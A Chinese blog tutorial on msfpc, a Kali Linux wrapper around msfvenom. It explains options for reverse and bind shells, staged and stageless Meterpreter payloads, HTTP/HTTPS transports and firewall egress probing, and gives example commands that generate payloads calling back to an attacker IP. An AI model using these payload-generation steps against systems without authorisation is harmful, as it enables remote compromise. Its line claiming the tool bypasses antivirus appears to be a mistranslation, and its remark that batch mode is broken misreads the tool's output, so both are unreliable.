Kali Linux 漏洞利用工具集 msfpc 教程-ITB运维部落—http://www.itbcn.cn—ITB运维技术交流之家平台
记录工作点滴
分享运维知识

Kali Linux 漏洞利用工具集 msfpc 教程

MSFPC全称“MSFvenom Payload Creator”是一个基于用户选择生成多种类型有效载荷的包装器。这个想法是尽可能简单(只需要一个输入)来产生他们的有效载荷。

 

完全自动化msfvenom&Metasploit是最终目标 (以及能够自动化MSFPC本身)。剩下的就是让用户的生活尽可能简单(如IP选择菜单,msfconsole资源文件/命令,批量有效载荷生成,并能够以任意顺序(以各种格式/模式)输入任何参数 )。

 

来自用户的唯一必要的输入应该是定义平台(例如 windows)所需的有效载荷,或者他们希望有效载荷具有的文件扩展名(例如 exe)。

 

  • 无法记住你的IP接口?不要冒汗,只需使用接口名称: eth0。
  • 不知道你的外部IP是什么?MSFPC将发现它: wan。
  • 想要生成每个有效载荷的一个?没有任何问题!尝试: loop。
  • 想批量创建有效载荷?一切?或者过滤你的选择?无论如何,这不是一个问题。尝试:( batch对于所有内容), batch msf (对于每一个Meterpreter选项), batch staged (对于每个阶段负载)或 batch cmd stageless (对于每个无阶段命令提示符)!

 

注意:这将  尝试在任何阶段绕过任何防病毒解决方案。

 

用法:

/usr/bin/msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)

 

参数说明:

 

<TYPE>:

+ APK

+ ASP

+ ASPX

+ Bash [.sh]

+ Java [.jsp]

+ Linux [.elf]

+ OSX [.macho]

+ Perl [.pl]

+ PHP

+ Powershell [.ps1]

+ Python [.py]

+ Tomcat [.war]

+ Windows [.exe // .dll]

 

<DOMAIN / IP>:

而不是把<DOMAIN / IP>,你可以做一个接口,MSFPC将检测到该IP地址。

缺少<DOMAIN / IP>将默认为IP菜单。

 

<PORT>:

缺少<PORT>将默认为443端口。

 

<CMD/MSF>:

<CMD>是与之交互的标准/本地命令提示符/终端。

<MSF>是一个自定义的跨平台shell,获得了Metasploit的全部功能。

如果可能,缺少<CMD / MSF>将默认为<MSF>。

 

<BIND/REVERSE>:

<BIND>打开目标端的端口,攻击者连接到它们。目标上通常使用入口防火墙规则阻止。

<REVERSE>使目标连接回攻击者。攻击者需要一个开放的端口。阻止目标上的防火墙规则。

缺少<BIND / REVERSE>将默认为<REVERSE>。

 

<STAGED/STAGELESS>:

<STAGED>将有效载荷分成几部分,使其更小,但依赖于Metasploit。

<STAGELESS>是完整的独立有效载荷。比<STAGED>更“稳定”。

缺少<STAGED / STAGELESS>会在可能的情况下默认为<STAGED>。

 

<TCP/HTTP/HTTPS/FIND_PORT>:

<TCP>是连接的标准方法。这是与RAW类型最兼容的RAW格式。可以在IDS上轻松检测到。

<HTTP>使通信看起来是HTTP通信(未加密)。有助于限制协议上端口访问的数据包检测 – 例如TCP 80。

<HTTPS>使得通信看起来像使用SSL的(加密的)HTTP通信。有助于限制协议上端口访问的数据包检测 – 例如TCP 443。

<FIND_PORT>将尝试目标机器上的每个端口,找到出路。用于粘贴入口/入口防火墙规则。将根据<TYPE>切换到“allports”。

缺少<TCP / HTTP / HTTPS / FIND_PORT>将默认为<TCP>。

 

<BATCH/LOOP>:

<BATCH>将生成尽可能多的组合:<TYPE>,<CMD + MSF>,<BIND + REVERSE>,<STAGED + STAGLESS>&<TCP + HTTP + HTTPS + FIND_PORT>

<LOOP>将会创建每个<TYPE>中的一个。

 

<VERBOSE>:

<VERBOSE>将显示更多信息。

 

示例:

/ usr / bin / msfpc windows 192.168.1.10#Windows和手动IP。
/ usr / bin / msfpc elf bind eth0 4444#Linux,eth0的IP和手动端口。
/ usr / bin / msfpc stageless cmd py https#Python,无阶段的命令提示符。
/ usr / bin / msfpc verbose loop eth1#每种类型的有效载荷,使用eth1的IP。
/ usr / bin / msfpc msf batch wan#使用WAN IP的所有可能的Meterpreter有效载荷。
/usr/bin/msfpc help verbose  #帮助屏幕,提供更多信息。

 

msfpc效果与评价:

此工具还是非常棒的,只是在kali linux我启动的时候出了一个提示“[i] Missing TYPE or BATCH/LOOP mode([i]缺少TYPE或BATCH / LOOP模式)”,因此BATCH / LOOP模式这两个模式功能应该不能够使用了。

[i] Missing TYPE or BATCH/LOOP mode([i]缺少TYPE或BATCH / LOOP模式)

如果你想使用这个功能,可以这样:

由于MSFPC已经包装在Kali Rolling中,所以你所要做的就是:

root @ kali:〜#apt install -y msfpc

 

在线视频:

优酷:http://v.youku.com/v_show/id_XMzI5MDY2NjQ1Mg==.html

腾讯:https://v.qq.com/x/page/k0528jwjwyz.html

爱奇艺:http://www.iqiyi.com/w_19rwk6475l.html

未经允许不得转载:ITB运维部落—http://www.itbcn.cn—ITB运维技术交流之家平台 » Kali Linux 漏洞利用工具集 msfpc 教程

如果文章对你有帮助,欢迎点击上方按钮打赏作者

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址